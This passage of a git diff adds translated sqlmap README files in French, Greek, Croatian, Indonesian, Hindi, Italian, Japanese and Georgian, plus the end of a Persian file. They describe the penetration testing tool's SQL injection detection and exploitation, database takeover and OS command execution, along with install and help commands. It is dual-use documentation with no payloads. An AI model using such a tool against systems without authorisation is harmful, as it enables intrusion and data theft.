+ + +``` + python sqlmap.py -h +``` + + + + +
+ + +برای دریافت لیست تمامی ارگومان‌ها می‌توانید از دستور زیر استفاده کنید: + +
+ + +``` + python sqlmap.py -hh +``` + + +
+ + +برای اجرای سریع و ساده ابزار می توانید از [اینجا](https://asciinema.org/a/46601) استفاده کنید. برای دریافت اطلاعات بیشتر در رابطه با قابلیت ها ، امکانات قابل پشتیبانی و لیست کامل امکانات و دستورات همراه با مثال می‌ توانید به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید. + + +لینک‌ها +---- + + +* خانه: https://sqlmap.org +* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یا [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* پیگیری مشکلات: https://github.com/sqlmapproject/sqlmap/issues +* راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki +* سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* توییتر: [@sqlmap](https://twitter.com/sqlmap) +* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* تصاویر: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-fr-FR.md b/src/sqlmap-master/doc/translations/README-fr-FR.md new file mode 100644 index 0000000..9f35574 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-fr-FR.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation. + +---- + +![Les Captures d'écran](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Les captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) démontrent des fonctionnalités de __sqlmap__. + +Installation +---- + +Vous pouvez télécharger le fichier "tarball" le plus récent en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger l'archive zip la plus récente [ici](https://github.com/sqlmapproject/sqlmap/zipball/master). + +De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6**, **2.7** et **3.x** de [Python](https://www.python.org/download/) + +Utilisation +---- + +Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez: + + python sqlmap.py -h + +Pour afficher une liste complète des options et des commutateurs (switches), tapez: + + python sqlmap.py -hh + +Vous pouvez regarder une vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples. +Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge, la description de toutes les options, ainsi que des exemples, nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Liens +---- + +* Page d'acceuil: https://sqlmap.org +* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues +* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki +* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Démonstrations: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-gr-GR.md b/src/sqlmap-master/doc/translations/README-gr-GR.md new file mode 100644 index 0000000..d634b69 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-gr-GR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων. + +Εικόνες +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά. + +Εγκατάσταση +---- + +Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](https://www.python.org/download/) έκδοσης **2.6**, **2.7** και **3.x** σε όποια πλατφόρμα. + +Χρήση +---- + +Για να δείτε μια βασική λίστα από επιλογές πατήστε: + + python sqlmap.py -h + +Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε: + + python sqlmap.py -hh + +Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://asciinema.org/a/46601). +Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Σύνδεσμοι +---- + +* Αρχική σελίδα: https://sqlmap.org +* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues +* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki +* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-hr-HR.md b/src/sqlmap-master/doc/translations/README-hr-HR.md new file mode 100644 index 0000000..20c0131 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-hr-HR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza. + +Slike zaslona +---- + +![Slika zaslona](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama. + +Instalacija +---- + +Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap radi bez posebnih zahtjeva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. + +Korištenje +---- + +Kako biste dobili listu osnovnih opcija i prekidača koristite: + + python sqlmap.py -h + +Kako biste dobili listu svih opcija i prekidača koristite: + + python sqlmap.py -hh + +Možete pronaći primjer izvršavanja [ovdje](https://asciinema.org/a/46601). +Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Poveznice +---- + +* Početna stranica: https://sqlmap.org +* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues +* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki +* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-id-ID.md b/src/sqlmap-master/doc/translations/README-id-ID.md new file mode 100644 index 0000000..864938b --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-id-ID.md @@ -0,0 +1,53 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap adalah perangkat lunak sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data. + +sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Perangkat lunak ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. + +Tangkapan Layar +---- + +![Tangkapan Layar](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Anda juga dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki. + +Instalasi +---- + +Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Sebagai alternatif, Anda dapat mengunduh sqlmap dengan melakukan _clone_ pada repositori [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi **2.6**, **2.7** dan **3.x** pada platform apapun. + +Penggunaan +---- + +Untuk mendapatkan daftar opsi dasar gunakan perintah: + + python sqlmap.py -h + +Untuk mendapatkan daftar opsi lanjutan gunakan perintah: + + python sqlmap.py -hh + +Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601). + +Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya. Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Tautan +---- + +* Situs: https://sqlmap.org +* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS Feed Dari Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues +* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki +* Pertanyaan Yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos) +* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-in-HI.md b/src/sqlmap-master/doc/translations/README-in-HI.md new file mode 100644 index 0000000..623f1c7 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-in-HI.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap एक ओपन सोर्स प्रवेश परीक्षण उपकरण है जो SQL इन्जेक्शन दोषों की पहचान और उपयोग की प्रक्रिया को स्वचलित करता है और डेटाबेस सर्वरों को अधिकृत कर लेता है। इसके साथ एक शक्तिशाली पहचान इंजन, अंतिम प्रवेश परीक्षक के लिए कई निचले विशेषताएँ और डेटाबेस प्रिंट करने, डेटाबेस से डेटा निकालने, नीचे के फ़ाइल सिस्टम तक पहुँचने और आउट-ऑफ-बैंड कनेक्शन के माध्यम से ऑपरेटिंग सिस्टम पर कमांड चलाने के लिए कई बड़े रेंज के स्विच शामिल हैं। + +चित्रसंवाद +---- + +![स्क्रीनशॉट](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +आप [विकि पर](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) कुछ फीचर्स की दिखाते हुए छवियों का संग्रह देख सकते हैं। + +स्थापना +---- + +आप नवीनतम तारबाल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/tarball/master) या नवीनतम ज़िपबॉल को [यहां क्लिक करके](https://github.com/sqlmapproject/sqlmap/zipball/master) डाउनलोड कर सकते हैं। + +प्राथमिकत: आप sqlmap को [गिट](https://github.com/sqlmapproject/sqlmap) रिपॉजिटरी क्लोन करके भी डाउनलोड कर सकते हैं: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap [Python](https://www.python.org/download/) संस्करण **2.6**, **2.7** और **3.x** पर किसी भी प्लेटफार्म पर तुरंत काम करता है। + +उपयोग +---- + +मौलिक विकल्पों और स्विच की सूची प्राप्त करने के लिए: + + python sqlmap.py -h + +सभी विकल्पों और स्विच की सूची प्राप्त करने के लिए: + + python sqlmap.py -hh + +आप [यहां](https://asciinema.org/a/46601) एक नमूना चलाने का पता लगा सकते हैं। sqlmap की क्षमताओं की एक अवलोकन प्राप्त करने, समर्थित फीचर्स की सूची और सभी विकल्पों और स्विच का वर्णन, साथ ही उदाहरणों के साथ, आपको [उपयोगकर्ता मैन्युअल](https://github.com/sqlmapproject/sqlmap/wiki/Usage) पर परामर्श दिया जाता है। + +लिंक +---- + +* मुखपृष्ठ: https://sqlmap.org +* डाउनलोड: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) या [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* संवाद आरएसएस फ़ीड: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* समस्या ट्रैकर: https://github.com/sqlmapproject/sqlmap/issues +* उपयोगकर्ता मैन्युअल: https://github.com/sqlmapproject/sqlmap/wiki +* अक्सर पूछे जाने वाले प्रश्न (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* ट्विटर: [@sqlmap](https://twitter.com/sqlmap) +* डेमो: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* स्क्रीनशॉट: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots +* diff --git a/src/sqlmap-master/doc/translations/README-it-IT.md b/src/sqlmap-master/doc/translations/README-it-IT.md new file mode 100644 index 0000000..007fcdb --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-it-IT.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band. + +Screenshot +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Nella wiki puoi visitare [l'elenco di screenshot](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) che mostrano il funzionamento di alcune delle funzionalità del programma. + +Installazione +---- + +Puoi scaricare l'ultima tarball cliccando [qui](https://github.com/sqlmapproject/sqlmap/tarball/master) oppure l'ultima zipball cliccando [qui](https://github.com/sqlmapproject/sqlmap/zipball/master). + +La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap è in grado di funzionare con le versioni **2.6**, **2.7** e **3.x** di [Python](https://www.python.org/download/) su ogni piattaforma. + +Utilizzo +---- + +Per una lista delle opzioni e dei controlli di base: + + python sqlmap.py -h + +Per una lista di tutte le opzioni e di tutti i controlli: + + python sqlmap.py -hh + +Puoi trovare un esempio di esecuzione [qui](https://asciinema.org/a/46601). +Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità e la descrizione di tutte le sue opzioni e controlli, insieme ad un gran numero di esempi, siete pregati di visitare lo [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (disponibile solo in inglese). + +Link +---- + +* Sito: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki +* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* Dimostrazioni: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-ja-JP.md b/src/sqlmap-master/doc/translations/README-ja-JP.md new file mode 100644 index 0000000..cf53885 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-ja-JP.md @@ -0,0 +1,51 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。 +強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。 + +スクリーンショット +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +wikiに載っているいくつかの機能のデモをスクリーンショットで見ることができます。 [スクリーンショット集](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) + +インストール +---- + +最新のtarballを [こちら](https://github.com/sqlmapproject/sqlmap/tarball/master) から、最新のzipballを [こちら](https://github.com/sqlmapproject/sqlmap/zipball/master) からダウンロードできます。 + +[Git](https://github.com/sqlmapproject/sqlmap) レポジトリをクローンして、sqlmapをダウンロードすることも可能です。: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmapは、 [Python](https://www.python.org/download/) バージョン **2.6**, **2.7** または **3.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。 + +使用方法 +---- + +基本的なオプションとスイッチの使用方法をリストで取得するには: + + python sqlmap.py -h + +全てのオプションとスイッチの使用方法をリストで取得するには: + + python sqlmap.py -hh + +実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。 +sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用方法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。 + +リンク +---- + +* ホームページ: https://sqlmap.org +* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* 課題管理: https://github.com/sqlmapproject/sqlmap/issues +* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki +* よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* デモ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-ka-GE.md b/src/sqlmap-master/doc/translations/README-ka-GE.md new file mode 100644 index 0000000..ccbad80 --- /dev/null +++ b/src/sqlmap-master/doc/translations/README-ka-GE.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap არის შეღწევადობის ტესტირებისათვის განკუთვილი ინსტრუმენტი, რომლის კოდიც ღიად არის ხელმისაწვდომი. ინსტრუმენტი ახდენს SQL-ინექციის სისუსტეების აღმოჩენისა, გამოყენების და მონაცემთა ბაზათა სერვერების დაუფლების პროცესების ავტომატიზაციას. იგი აღჭურვილია მძლავრი აღმომჩენი მექანიძმით, შეღწევადობის პროფესიონალი ტესტერისათვის შესაფერისი ბევრი ფუნქციით და სკრიპტების ფართო სპექტრით, რომლებიც შეიძლება გამოყენებულ იქნეს მრავალი მიზნით, მათ შორის: მონაცემთა ბაზიდან მონაცემების შეგროვებისათვის, ძირითად საფაილო სისტემაზე წვდომისათვის და out-of-band კავშირების გზით ოპერაციულ სისტემაში ბრძანებათა შესრულებისათვის. + +ეკრანის ანაბეჭდები +---- + +![ეკრანის ანაბეჭდი](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +შეგიძლიათ ესტუმროთ [ეკრანის ანაბეჭდთა კოლექციას](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), სადაც დემონსტრირებულია ინსტრუმენტის ზოგიერთი ფუნქცია. + +ინსტალაცია +---- + +თქვენ შეგიძლიათ უახლესი tar-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/tarball/master) დაწკაპუნებით, ან უახლესი zip-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/zipball/master) დაწკაპუნებით. + +ასევე შეგიძლიათ (და სასურველია) sqlmap-ის ჩამოტვირთვა [Git](https://github.com/sqlmapproject/sqlmap)-საცავის (repository) კლონირებით: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap ნებისმიერ პლატფორმაზე მუშაობს [Python](https://www.python.org/download/)-ის **2.6**, **2.7** და **3.x** ვერსიებთან. + +გამოყენება +---- + +ძირითადი ვარიანტებისა და პარამეტრების ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება: + + python sqlmap.py -h + +ვარიანტებისა და პარამეტრების სრული ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება: + + python sqlmap.py -hh + +გამოყენების მარტივი მაგალითი შეგიძლიათ იხილოთ [აქ](https://asciinema.org/a/46601). sqlmap-ის შესაძლებლობათა მიმოხილვის, მხარდაჭერილი ფუნქციონალისა და ყველა ვარიანტის აღწერების მისაღებად გამოყენების მაგალითებთან ერთად, გირჩევთ, იხილოთ [მომხმარებლის სახელმძღვანელო](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +ბმულები +---- + +* საწყისი გვერდი: https://sqlmap.org +* ჩამოტვირთვა: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ან [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS არხი: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* პრობლემებისათვის თვალყურის დევნება: https://github.com/sqlmapproject/sqlmap/issues +* მომხმარებლის სახელმძღვანელო: https://github.com/sqlmapproject/sqlmap/wiki +* ხშირად დასმული კითხვები (ხდკ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://twitter.com/sqlmap) +* დემონსტრაციები: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* ეკრანის ანაბეჭდები: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/src/sqlmap-master/doc/translations/README-ko-KR.md 